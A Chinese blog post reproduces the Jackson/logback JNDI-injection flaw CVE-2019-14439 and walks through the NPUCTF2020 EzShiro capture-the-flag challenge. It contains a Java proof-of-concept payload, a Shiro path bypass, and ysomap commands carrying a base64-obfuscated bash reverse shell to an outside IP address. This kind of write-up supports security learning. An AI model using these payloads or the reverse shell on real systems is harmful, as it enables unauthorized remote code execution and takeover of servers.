CVE-2019-14439以及[NPUCTF2020]EzShiro复现

最新推荐文章于 2024-06-15 18:15:57 发布
最新推荐文章于 2024-06-15 18:15:57 发布
阅读量4.9k 收藏 3
点赞数 5
分类专栏: ctfwp 文章标签: java 安全 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/122083077
版权

CVE-2019-14439

是由logback 引起的 jndi 注入,找不到详细分析的文章,对着网上的poc简单看了一下。

ch.qos.logback.core.db.JNDIConnectionSource这个类里

1640089832227.jpeg

1640080058330.jpeg

漏洞原理并不复杂,很清晰明了的jndi注入。

poc

package Jackson;


import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;

public class logback {

    public static void main(String[] args) throws IOException, IOException {

				String json = "[\"ch.qos.logback.core.db.JNDIConnectionSource\"," +
                "{\"jndiLocation\":\"ldap://127.0.0.1:1089/Exploit\"}]";
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        Object o = mapper.readValue(json, Object.class);
        mapper.writeValueAsString(o);
    }

}

1640080727072.png

[NPUCTF2020]EzShiro

一开始没做出来,后来看wp知道附件有pom.xml buu似乎没给

<dependencies>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
    </dependency>

    <dependency>
      <groupId>org.apache.shiro</groupId>
      <artifactId>shiro-web</artifactId>
      <version>1.5.1</version>
    </dependency>
    <dependency>
      <groupId>org.apache.shiro</groupId>
      <artifactId>shiro-spring</artifactId>
      <version>1.5.1</version>
    </dependency>
    <dependency>
      <groupId>ch.qos.logback</groupId>
      <artifactId>logback-core</artifactId>
      <version>1.2.1</version>
    </dependency>
    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>3.2.1</version>
    </dependency>
  </dependencies>

看到有logback 先是shiro的权限绕过来到/json。访问/;/json

post一个true看到Jackson

1640089703761.png

jackson+logback 应该就是CVE-2019-14439了,源码应该是用jackson对post的json数据进行反序列化

但遇到个问题,我直接打没有打通,这里好像还需要绕限制。

看了看wp,参考的是这个。文章里有提到

https://paper.seebug.org/942/#ldapgadget

1640093819476.png

应该是题目jvm版本太高了。得加载题目自带的链子,看到pom里有commons-collections

wp里直接用ysomap工具了,还没在比赛里用过这个工具,顺带学一学。

https://github.com/wh1t3p1g/ysomap

use exploit LDAPLocalChainListener
set lport 6688
use payload  CommonsCollections8
use bullet TransformerBullet
set version 3
set command 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuNzAuNDAuNS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
run

使用这工具必须的是jdk8,并且jdk8版本不能过低

1640147973090.png

能弹成功,期末考完去研究一下工具源码

fmyyy1
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
[NPUCTF2020]EzRSA
2er0!=O的博客
07-25 538
[NPUCTF2020]EzRSA 附件: from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fla
[NPUCTF2020]ReadlezPHP
missht0的博客
01-30 271
[NPUCTF2020]ReadlezPHP 在源码里面搜索php,搜到一个 访问后是源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __de
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。阿里云应急响应中心提醒Jackson用户尽快采取安全措施阻止漏洞攻击。
shiro反序列化漏洞学习(工具+原理+复现
最新发布
heike_Ch的博客
06-15 786
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
[NPUCTF2020]EzRSA Writeup
bestkasscn的博客
12-02 548
[NPUCTF2020]EzRSA 题目描述 from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fl
[NPUCTF2020]ezlogin
nigo134的博客
06-13 575
xPath注入这题服务端用户名和密码通过xml文件存储,通过将提交的用户名和密码拼接到xpath中进行查询,查询到数据即通过验证,反之则未通过。猜测后台xpath语法: 我们可以在$username处进行注入1.获取根下的节点个数 通过count(/)获取根下节点个数,当等于2时错误因此判断根下只有一个节点。2.获取根下节点名 string-length() :获取字符串长度substring() :截取字符串name() :获取节点名称3.重复1和2遍历出所有叶子
wp:buuctf [NPUCTF2020]EzReverse
m0_60894126的博客
07-28 290
buuctf [NPUCTF2020]EzReverse
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-2019-11708诱骗父流程浏览到任意URL。 在过去的中,我已经介绍了CVE-2019-9810的根本原因和利用文章以及相关的。 CVE-2019-11708已由公告,并...
Web-11(41-44)-BUUCTF平台
~airrudder~
07-09 870
本篇内容 [NPUCTF2020]ReadlezPHP [NPUCTF2020]ezlogin [NPUCTF2020]ezinclude [NPUCTF2020]验证???? [NPUCTF2020]web???? [NPUCTF2020]EzShiro 上一篇 | 目录 | 下一篇 [NPUCTF2020]ReadlezPHP 直接加view-source:查看源代码: <?php #err...
Java Web 安全】jackson漏洞探究、利用、预防
qqchaozai的专栏
08-15 4793
前言 阿里云安全公告:2019年7月31日,阿里云应急响应中心监测到有安全研究人员披露Jackson最新反序列化远程代码执行漏洞(CVE-2019-14361和CVE-2019-14439)。同事说怎么jackson这类的json序列化库经常报漏洞,而且基本都是高危漏洞,这些漏洞到底怎么来的,jackson的开发程序员就这么不靠谱么?改不完的BUG?这篇文章就让我们走进jackson的世界,感受...
漏洞情报|Jackson-databind反序列化漏洞风险通告(CVE-2020-35490,CVE-2020-35491)
Gblfy_Blog
11-05 2599
反序列化漏洞
Java安全漏洞致10亿电脑处于安全威胁中
invincible_lanqi的专栏
09-30 2169
甲骨文Java软件中发现了最新的0day漏洞,这一漏洞几乎出现在所有受支持的Java版本中,通过此漏洞,黑客可在超过10亿台装有Java的 Mac和PC机上安装恶意软件与病毒。安全专家Adam Gowdiak昨天宣布,这一安全漏洞存在于Java 5、Java 6和Java 7中。计算机世界还特别指出,使用Mac OS X最新版本系统的用户同样存在这一安全问题,包括Snow Leopard 10.6
刷题记录-NPUCTF2020(web部分)
weixin_43610673的博客
05-03 4859
在buu刷了一遍,题目好顶,还剩一题EzShiro摸不出来 ReadlezPHP 禁用了右键查看源代码 view-source: 自行加上前缀即可 打开链接/time.php?source 很明显,php反序列化,通过echo b(b(b(a); 写入shell,system等被禁用,用assert(断言) <?php class HelloPhp { public $a; ...
[JAVA安全]JACKSON反序列化
snowlyzz的博客
01-28 2048
JACKSON反序列化原理
Shiro框架漏洞分析与复现
未完成的歌~的博客
05-15 4022
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性,可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。
应用安全漏洞及修复
xinpz的博客
02-20 2326
应用安全漏洞及修复 近期阿里云服务漏洞扫描,发现大量应用安全漏洞,做出安全漏洞修复方案,一般三方jar包漏洞,官方发布漏洞时,肯定已有新版本做了处理,所以我们只需要做jar版本升级即可。 漏洞处理方案 2021-02-20 漏洞处理方案 编写目的 安全漏洞如果被恶意用户利用,会造成服务器及系统被攻击利用,造成严重损失。 为保障服务及系统安全,发现的安全漏洞需要及时修复。 适用范围 研发人员,运维人员 安全漏洞 阿里云业务层面漏洞整理文档 XStream 漏洞...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞是 CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.9.x 版本。 CVE-2019-14439 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.6.x 至 2.9.x 版本。 为了解决这些漏洞,建议开发人员尽快升级到最新版本的 Jackson-databind 库。另外,还可以考虑限制反序列化操作的使用,以减少潜在的风险。记住及时关注安全公告,并采取相应的措施来保护应用程序免受可能的攻击。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值